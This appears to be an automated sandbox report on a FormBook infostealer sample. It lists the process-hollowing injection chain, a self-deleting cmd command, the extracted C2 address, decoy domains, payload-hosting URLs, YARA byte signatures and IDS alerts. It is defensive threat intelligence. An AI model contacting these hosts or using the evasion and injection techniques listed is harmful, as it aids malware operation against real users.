Edit tour

Windows Analysis Report
U8RYIwIvfK.exe

Overview

General Information

Sample Name:	U8RYIwIvfK.exe
Analysis ID:	736964
MD5:	6f53598b9c19b30a0cf3ff0432301708
SHA1:	4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
SHA256:	6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

.NET source code references suspicious native API functions

Machine Learning detection for sample

Allocates memory in foreign processes

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to communicate with device drivers

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

U8RYIwIvfK.exe (PID: 5840 cmdline: C:\Users\user\Desktop\U8RYIwIvfK.exe MD5: 6F53598B9C19B30A0CF3FF0432301708)

aspnet_compiler.exe (PID: 5140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 6124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

aspnet_compiler.exe (PID: 6120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 4120 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x958a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17839:$sqlite3step: 68 34 1C 7B E1 0x1794c:$sqlite3step: 68 34 1C 7B E1 0x17868:$sqlite3text: 68 38 2A 90 C5 0x1798d:$sqlite3text: 68 38 2A 90 C5 0x1787b:$sqlite3blob: 68 53 D8 7F 8C 0x179a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8bb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4839:$sqlite3step: 68 34 1C 7B E1 0x494c:$sqlite3step: 68 34 1C 7B E1 0x4868:$sqlite3text: 68 38 2A 90 C5 0x498d:$sqlite3text: 68 38 2A 90 C5 0x487b:$sqlite3blob: 68 53 D8 7F 8C 0x49a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8bb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4839:$sqlite3step: 68 34 1C 7B E1 0x494c:$sqlite3step: 68 34 1C 7B E1 0x4868:$sqlite3text: 68 38 2A 90 C5 0x498d:$sqlite3text: 68 38 2A 90 C5 0x487b:$sqlite3blob: 68 53 D8 7F 8C 0x49a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7ecf9:$a1: 3C 30 50 4F 53 54 74 09 40 0xac119:$a1: 3C 30 50 4F 53 54 74 09 40 0x95658:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc2a78:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x83467:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb0887:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8e34f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbb76f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x823b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8261a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xaf7d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xafa3a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8e14d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbb56d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8dc39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbb059:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8e24f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbb66f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e3c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbb7e7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83032:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb0452:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8ceb4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xba2d4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x83d2b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xb114b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x943bf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xc17df:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x953c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x912e1:$sqlite3step: 68 34 1C 7B E1 0x913f4:$sqlite3step: 68 34 1C 7B E1 0xbe701:$sqlite3step: 68 34 1C 7B E1 0xbe814:$sqlite3step: 68 34 1C 7B E1 0x91310:$sqlite3text: 68 38 2A 90 C5 0x91435:$sqlite3text: 68 38 2A 90 C5 0xbe730:$sqlite3text: 68 38 2A 90 C5 0xbe855:$sqlite3text: 68 38 2A 90 C5 0x91323:$sqlite3blob: 68 53 D8 7F 8C 0x9144b:$sqlite3blob: 68 53 D8 7F 8C 0xbe743:$sqlite3blob: 68 53 D8 7F 8C 0xbe86b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: U8RYIwIvfK.exe PID: 5840	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xad979:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: aspnet_compiler.exe PID: 6120	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x153:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmd.exe PID: 5916	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xb49b:$a1: 3C 30 50 4F 53 54 74 09 40 0x137de3:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.0.aspnet_compiler.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.aspnet_compiler.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C

Snort Signatures

ET TROJAN Windows executable base64 encoded - Source IP: 50.115.174.192 - Destination IP: 192.168.2.6

Timestamp:	50.115.174.192192.168.2.6443497042018856 11/03/22-12:39:59.450093
SID:	2018856
Source Port:	443
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859575532012811 11/03/22-12:39:56.025984
SID:	2012811
Source Port:	59575
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: U8RYIwIvfK.exe	ReversingLabs: Detection: 43%
Source: U8RYIwIvfK.exe	Virustotal: Detection: 38%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: https://tgc8x.tk/tt/ptrr.txt	Avira URL Cloud: Label: phishing
Source: https://tgc8x.tk/tt/BLACKDEV.txt	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: tgc8x.tk	Virustotal: Detection: 5%			Perma Link
Source: https://tgc8x.tk	Virustotal: Detection: 6%			Perma Link

Machine Learning detection for sample

Source: U8RYIwIvfK.exe

Joe Sandbox ML: detected

Source: 3.0.aspnet_compiler.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ept-egy.com/zx85/"], "decoy": ["myclassly.com", "rilcon.xyz", "miracleun.shop", "gadgetward-usa.com", "farmaacademy.com", "dreamsolutions.group", "fffood.online", "ziggnl.site", "cherpol.com", "imprescriptible-tienoscope.biz", "yztc.fun", "chicagonftweek.com", "zz0659.com", "hznaixi.com", "027-seo.net", "korlekded.com", "gelatoitaly.com", "finlitguru.com", "gupingapp.com", "manmakecoffee.com", "yuanwei.lol", "cargovoyager.com", "getjobzz.com", "dagatructiephd.com", "mynab.mobi", "masteralbert.com", "rtugwmt0cs.vip", "uscanvas.net", "nocrytech.com", "canadaroi.com", "archivegamer.com", "crossinspectionservices.com", "dxxws.com", "rufflyfedogtraining.com", "prgrn.dev", "bwdcourses.com", "criptomexico.com", "elisabethingram.online", "drationa.shop", "pulsarthermalscope.shop", "grcpp8vyuk.vip", "sh-whyyl.com", "in-cdn.xyz", "aquatabdouro.online", "handsomeshooterjewelry.com", "erug.store", "trueimpact.studio", "taskalso.com", "dzslqdz.xyz", "barbushing.com", "freightxpert.com", "777703.xyz", "bradysproducts.com", "teensforcp.site", "gpssystemecuador.com", "luxslides.com", "sony8ktv.monster", "baxiservisim.xyz", "lojascacau.com", "sfanci.com", "magdrade.com", "jobreadyfresher.com", "dori-maniacs.com", "mercydm.mobi"]}

Source: unknown

HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49701 version: TLS 1.2

Source: U8RYIwIvfK.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
